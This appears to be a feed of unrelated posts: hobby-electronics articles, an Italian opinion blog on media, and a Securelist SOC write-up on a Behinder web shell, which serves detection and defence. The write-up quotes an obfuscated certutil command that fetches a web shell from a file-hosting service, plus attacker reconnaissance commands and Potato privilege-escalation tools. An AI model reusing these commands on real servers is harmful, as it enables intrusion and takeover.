Nickel contamination can render soils infertile at levels that are currently impractical to treat. Researchers at UMass Amherst are looking at how plants can help these soils and source nickel for the growing EV market.

Phytoremediation is the use of plants that preferentially hyperaccumulate certain contaminants to clean the soil. When those contaminants are also critical materials, you get phytomining. Starting with Camelina sativa, the researchers are looking to enhance its preference for nickel accumulation with genes from the even more adept hyperaccumulator Odontarrhena to have a quick-growing plant that can be a nickel feedstock as well as produce seeds containing oil for biofuels.

Despite being able to be up to 3% Ni by weight, Odontarrhena was ruled out as a candidate itself due to its slow-growing nature and that it is invasive to the United States. The researchers are also looking into what soil amendments can best help this super Camelina sativa best achieve its goals. It’s no panacea for expected nickel demand, but they do project that phytomining could provide 20-30% of our nickel needs for 50 years, at which point the land could be turned back over to other uses.

Recycling things already in technical cycles will be important to a circular economy, but being able to remove contaminants from the environment’s biological cycles and place them into a safer technical cycle instead of just burying them will be a big benefit as well. If you want learn about a more notorious heavy metal, checkout our piece on the blessings and destruction wrought by lead.

youtube.com/embed/zYB-DlEtFdE?…

hackaday.com/2025/02/28/phytor…

Lego! It’s a fun toy that is popular around the world. What you may not realize is that it’s also made to incredibly high standards. As it turns out, the humble building blocks are good enough to build a interferometer if you’re so inclined to want one. [Kyra Cole] shows us how it’s done.

The build in question is a Michelson interferometer; [Kyra] was inspired to build it based on earlier work by the myphotonics project. She was able to assemble holders for mirrors and a laser, as well as a mount for a beamsplitter, and then put it all together on a Lego baseboard. While some non-Lego rubber bands were used in some areas, ultimately, adjustment was performed with Lego Technic gears.

Not only was the Lego interferometer able to generate a proper interference pattern, [Kyra] then went one step further. A Raspberry Pi was rigged up with a camera and some code to analyze the interference patterns automatically.

[Kyra] notes that using genuine Lego bricks was key to her success. Their high level of dimensional accuracy made it much easier to achieve her end goal. Sloppily-built knock-off bricks may have made the build much more frustrating to complete.

We don’t feature a ton of interferometer hacks around these parts. However, if you’re a big physics head, you might enjoy our 2021 article on the LIGO observatory. If you’re cooking up your own physics experiments at home, don’t hesitate to drop us a line!

[Thanks to Peter Quinn for the tip!]

hackaday.com/2025/02/28/buildi…

Web shells have evolved far beyond their original purpose of basic remote command execution, and many now function more like lightweight exploitation frameworks. These tools often include features such as in-memory module execution and encrypted command-and-control (C2) communication, giving attackers flexibility while minimizing their footprint.

This article walks through a SOC investigation where efficient surface-level analysis led to the identification of a web shell associated with a well-known toolset commonly associated with Chinese-speaking threat actors. Despite being a much-discussed tool, it is still used by the attackers for post-exploitation activities, thanks to its modular design and adaptability. We’ll break down the investigative process, detail how the analysts uncovered the web shell family, and highlight practical detection strategies to help defenders identify similar threats.

Onset

It’s early Monday morning, almost 4am UTC time, and the apparent nighttime calm inside the SOC is abruptly interrupted by an alert from our SIEM. It indicates that Kaspersky Endpoint Security’s heuristic engine has detected a web shell (HEUR:Backdoor.MSIL.WebShell.gen) on the SharePoint server of a government infrastructure in Southeast Asia, a warning that no SOC analyst would want to ignore.
C:\Windows\System32\inetsrv\w3wp.exe -ap "SharePoint" [...]
└── "cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il -u""""r""""l""""c""""a""""c""""h""""e"""" -split -f hxxps://bashupload[.]com/[REDACTED]/404.aspx 404.aspx
└── C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\[REDACTED]\[REDACTED]\App_Web_404.aspx.[REDACTED].[REDACTED].dll
The night shift team springs into action, knowing that the web shell could be the beginning of much worse activity, and that every second counts. Initial analysis of the telemetry suggests that the attackers exploited the affected web server, either by taking advantage of another web shell or a command injection vulnerability.

From the listing above, where the process tree that triggered the first detection is reported, it is possible to observe an attempt to deploy a web shell disguised as a 404 page. The certutil utility was used to download the ASPX payload, which was hosted by abusing Bashupload. This web service, which is used to upload files from the command line and allows one-time downloads of samples, is no stranger to being abused as an ingress tool transfer technique.

As is common practice, the command has been slightly obfuscated by using escape characters (such as ^ and “) to break up the keywords “certutil” and “urlcache” in order to bypass basic detection rules based on simple pattern matching.
As part of our MDR service, we are required to operate within pre-established boundaries that are tailored to the customer’s business continuity needs and risk tolerance. In this case, the customer retains ownership of decisions regarding sensitive assets, including the isolation of compromised hosts, so we can’t instantly block the attack and must continue to observe and perform a preliminary threat analysis.

A manual reconnaissance and discovery activity by an operator starts appearing, and despite the tension, an occasional typo (“localgorup”) manages to draw a smile:
whoami
net user
query user
net localgorup administrators
net localgroup administrators
whoami /all
"cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il[...]

Aftermath

To gain system privileges, the threat actors used several variants of the well-known Potato tools, either as memory-only modules or as standalone executables:
Paths:
C:\ProgramData\DRM\god.exe
C:\Users\Default\Videos\god.exe
MD5: 0xEF153E1E216C80BE3FDD520DD92526F4
Description: GodPotato

Process: C:\Windows\System32\inetsrv\w3wp.exe
MD5 (memory region): 0xB8A468615E0B0072D2F32E44A7C9A62F
Description: BadPotato
Original filename: BadPotato.dll
MD5 (memory region): 0xB5755BE4AAD8D8FE1BD0E6AC5728067B
Description: SweetPotato
Original filename: SweetPotato.dll
To bring standalone binaries into the environment, the attackers again used the Bashupload free web service, which we saw in the initial web shell alert. Of all the tools, the GodPotato standalone binary ultimately succeeded in gaining system privileges.

With elevated access, the attackers moved on to domain trust enumeration, mapping relationships between domains and identifying potential targets for lateral movement. But let’s get back to the main question: What kind of web shell are we dealing with here?

Identifying the threat

Unfortunately, we were unable to retrieve the web shell sample used during the initial access phase. However, starting with the privilege escalation phase, several .NET modules began to appear in the memory of the IIS worker process (
w3wp.exe), ranging from popular tools like Potato to other lesser known ones. One set of libraries in particular caught our attention, so we decided to investigate further by performing a manual inspection.
Fortunately, the libraries were not obfuscated and lent themselves to quick static analysis:

Example of a library detected in IIS process memory (0x0B593115C273A90886864AF7D4973EED)

In the image above, if you look at the orange method names in the Assembly Explorer on the left, you can observe some peculiarities that can be used to identify similar samples. Although many of the methods names are very generic, there is one that is quite unique,
EnjsonAndCrypt. A quick Google search of this name yields no results, which means it may be sample-specific.
The
getExtraData method is also interesting: although it has a non-specific name, there is a sequence of bytes [126, 126, 126, 126, 126, 126] that is used to parse key:value pairs whose value is base64 encoded:

The “extraData” structure example

Threat actors need to use the same byte sequence if they want to maintain backward compatibility across different implant versions, but since it is also very generic, we should combine both indicators, the getExtraData name and this byte array, to define a sufficiently precise detection condition that can be used in conjunction with EnjsonAndCrypt to create a detection rule.

Uncovering modules and variants

By feeding our newly created YARA rule to a multi-AV platform such as VirusTotal, we can identify additional samples that differ from those observed in the targeted infrastructure. It is worth noting that some of these have a poor detection rate:

Poorly detected BasicInfo.dll (32865229279DE31D08166F7F24226843) sample

Below are the most common names of libraries that match the rule:
BShell.dll
BasicInfo.dll
Cmd.dll
Database.dll
Echo.dll
Eval.dll
FileOperation.dll
Hs.dll
LoadNativeLibrary.dll
Loader.dll
Plugin.dll
PortMap.dll
RealCMD.dll
RemoteSocksProxy.dll
ReversePortMap.dll
SocksProxy.dll
Transfer.dll
Utils.dll
Module filenames

Those familiar with the toolkit used may have already identified it by looking at these filenames, but if not, it is also possible to infer the relationship by simply pivoting to the samples available on VT:

Sample FC793D722738C7FCDFE8DED66C96495B relations on VT

Behinder, also known as Rebeyond, Ice Scorpion, 冰蝎 (Bīng xiē), is known as a cross-platform web shell designed to be compatible with most popular web servers running PHP, Java or ASP.NET as in our investigation. Although the web shell sample itself is very lightweight and somewhat basic, the tool includes a powerful GUI for operators with numerous capabilities including loading additional modules and giving them full control over compromised environments.

Its built-in AES-encrypted communication allows threat actors to maintain stealthy control over a compromised web server, often bypassing traditional network detection mechanisms, and its modular, flexible nature allows malicious actors to use it as a base for customization even though it is only available as a pre-built tool on GitHub. Moreover, the presence of several step-by-step Chinese language tutorials on CSDN (Chinese Software Developer Network) makes it widely accessible to opportunistic bad actors.

The bigger picture

Taking a step back, the relationship between the memory artifacts observed on the customer’s server during the post-exploitation phase and the web shell source code becomes evident. The web shell is not just a foothold, it’s a fully functional backdoor that facilitates encrypted communication with the operators’ infrastructure, allowing them to call built-in or custom-loaded libraries, deploy additional tools, conduct reconnaissance and exfiltrate data while remaining hidden:

ASPX web shell side by side with .NET payload

Although the Behinder web shell has been widely discussed in the past, especially the PHP and JSP variants, it is still a current and evolving cyberweapon. Even if attackers make mistakes or act carelessly by reusing the same encryption keys or exhibiting the same patterns, we can’t afford to let our guard down. In the incident described in this article, if we had not taken the time to dig deeper into the artifacts observed in memory, we likely would have missed the toolkit altogether.

Threats evolve quickly, and signature-based malware detection only catches what we already know. Underestimating the potential of memory-based payloads can lead to a false sense of security. Teams may assume that if they haven’t detected any suspicious files, they are safe, when in fact threats may be actively operating in memory.

For SOC teams, continuous learning, proactive threat hunting, and refining detection techniques are essential to staying ahead of adversaries.

Happy hunting and see you on the next mission!

YARA rule

rule dotnetFrozenPayload
{
strings:
$CorDllMain_mscoree_dll = {00 5F 43 6F 72 44 6C 6C 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00}
$EnjsonAndCrypt = {00 45 6E 6A 73 6F 6E 41 6E 64 43 72 79 70 74 00}
$getExtraData = {00 67 65 74 45 78 74 72 61 44 61 74 61 00}
$extraDataMagicArray = {00 7E 7E 7E 7E 7E 7E 00} //0x00, byte[] {126, ...,}, 0x00
condition:
uint16(0) == 0x5A4D and
filesize < 400000 and
$CorDllMain_mscoree_dll and
(
$EnjsonAndCrypt or
(
$getExtraData and $extraDataMagicArray
)
)
}

Indicators of compromise

Payloads
EF153E1E216C80BE3FDD520DD92526F4 god.exe
B8A468615E0B0072D2F32E44A7C9A62F BadPotato.dll
B5755BE4AAD8D8FE1BD0E6AC5728067B SweetPotato.dll
578A303D8A858C3265DE429DB9F17695 BasicInfo.dll
EA19D6845B6FC02566468FF5F838BFF1 FileOperation.dll
CD56A5A7835B71DF463EC416259E6F8F Cmd.dll
5EA7F17E75D43474B9DFCD067FF85216 Echo.dll

File paths

C:\ProgramData\DRM\
C:\Users\Default\Videos\

securelist.com/soc-files-web-s…

River tables are something we’ve heard decried as a passé, but we’re still seeing some interesting variations on the technique. Take this example done with bronze instead of epoxy.

Starting with two beautiful slabs of walnut, [Burls Art] decided that instead of cutting them up to make guitars he would turn his attention to a river table to keep them more intact. Given the price of copper and difficulty in casting it, he decided to trim the live edges to make a more narrow “river” to work with for the project.

Since molten copper is quite toasty and wood likes to catch on fire, he wisely did a rough finish of the table before making silicone plugs of the voids instead of pouring metal directly. The silicone plugs were then used to make sand casting molds, and a series of casting trials moving from copper to bronze finally yielded usable pieces for the table. In case that all seems too simple, there were then several days of milling and sanding to get the bronze and walnut level and smooth with each other. The amount of attention to detail and plain old elbow grease in this project is impressive.

We’ve seen some other interesting mix-ups of the live edge and epoxy formula like a seascape night light or this river table with embedded neon. And if you’re looking to get into casting, why not start small in the microwave?

youtube.com/embed/slu4A4L0bqo?…

hackaday.com/2025/02/28/a-diff…

If you’ve ever seen those cheap LED fiber optic wands at the dollar store, you’ve probably just thought of them as a simple novelty. However, as [Ancient] shows us, you can turn them into a surprisingly nifty little display if you’re so inclined.

The build starts by removing the fiber optic bundle from the wand. One end is left as a round bundle. At the other end, the strands are then fed into plastic frames to separate them out individually. After plenty of tedious sorting, the fibers are glued in place in a larger rectangular 3D-printed frame, which holds the fibers in place over a matrix of LEDs. The individual LEDs of the matrix light individual fibers, which carry the light to the round end of the bundle. The result is a tiny little round display driven by a much larger one at the other end.

[Ancient] had hoped to use the set up for a volumetric display build, but found it too fragile to be fit for purpose. Still, it’s interesting to look at nonetheless, and a good demonstration of how fiber optics work in practice. As this display shows, you can have two glass fibers carrying completely different wavelengths of light right next to each other without issue.

We’ve featured some other great fiber optic hacks over the years, like this guide on making your own fiber couplings. Video after the break.

youtube.com/embed/zz59e1wWyVc?…

[Thanks to Zane and Darryl and Ash for the tip! This one was all over the tipsline!]

hackaday.com/2025/02/28/cheap-…

noblogo.org/transit/la-giusta-…

Transit

2025-02-28 13:34:31

La giusta distanza

(164)

Nel suo film del 2007 “La giusta distanza”, Carlo Mazzacurati narra la vicenda di un giovane apprendista giornalista, che non riesce, in merito ad un fatto di cronaca, a mantenere la “giusta distanza” dai fatti, come gli ha suggerito il suo mentore. Ovvero non riesce ad approfondire abbastanza quel che accade per averne una visione imparziale, il più possibile corretta e scevra da opinioni ed idee personali: quello che, nella teoria, ogni giornalista dovrebbe tendere a fare nel suo mestiere.

In Italia può essere portato ad esempio di come questo modo di operare sia, nei fatti, ignorato del tutto o quasi. Da parte di molte testate giornalistiche e di TG d'ogni canale è è un muoversi nelle direzioni più disparate: dapprima per rimanere “sul pezzo” e, passata la fase di picco a livello di notizia, per estendere all'infinito una serie di tematiche, perlopiù allarmiste e con un alto tasso di sensazionalismo, fino a coprire intere giornate di trasmissione.

E' anche un po' il limite, per esempio, dei canali “All News”, dove per ventiquattro ore al giorno si trasmette ogni sorta di dettaglio, di accadimento, di vocio per coprire la giornata intera. Reiterando all'infinito le stesse cose (non può accadere qualcosa di clamoroso ogni ora), si finisce con il “caricare” la notizia fino allo spasimo, spesso inserendo note di colore che rendono la narrazione volutamente altisonante, pervasiva, angosciante. Una estremizzazione indotta per mantenere attento lo spettatore.

Chiaramente è una maniera d'operare affatto corretta e per quanto giornalisti ed opinionisti lo neghino, appare abbastanza chiaro che è un mare in cui a loro piace nuotare. Possiamo comprendere che sia più semplice fare così che mantenere quella distanza di cui sopra: si rischia, magari, la noia o una maniera troppo blanda di porgere le notizie e molte persone amano, inconsciamente o meno, il clamore e la chiacchiera, a discapito di coloro che, invece, vorrebbero leggere o sentire semplicemente ciò che è successo, senza fronzoli.

D'altro canto ognuno può essere un amplificatore dei fatti: basta un account su “Facebook” o su “X” dove riprendere e commentare ogni cosa venga detta, magari distorcendo ulteriormente le cose, caricandole con opinioni personali (cui si ha diritto) e facendo rimbalzare tutto ovunque. Una sorta di cerchio infinito in cui la sconfitta è l'informazione di qualità, quella cui dovrebbero sempre ambire tutti. Sarebbe un freno per un mondo già sovraccarico di input, dove siamo “bombardati” senza sosta, senza tregua di cose che ci sentiamo obbligati a seguire.

Un corto circuito permanente d'attenzione e di sovraccarico mediatico. E come ogni cosa portata all'eccesso, è un danno. Cui, temo, non si possa più porre rimedio, se non con la volontà personale di distaccarsi da questa narrazione sbilanciata, reinserendo nel proprio modo di informarsi una quanto mai necessaria dose di distacco e di ragionamento. Cose difficili da fare, faticose, ma non impossibili.

#Blog #Opinioni #Media #News #Informazione

Mastodon: @alda7069@mastodon.unoTelegram: t.me/transitblogFriendica: @danmatt@poliverso.orgBio Site (tutto in un posto solo, diamine): bio.site/danielemattioli

Gli scritti sono tutelati da “Creative Commons” (qui)

Tutte le opinioni qui riportate sono da considerarsi personali. Per eventuali problemi riscontrati con i testi, si prega di scrivere a: corubomatt@gmail.com

Transit

Il blog di Alessandra Corubolo & Daniele Mattioli. On line -in varie forme- dal 2005.

^Telegram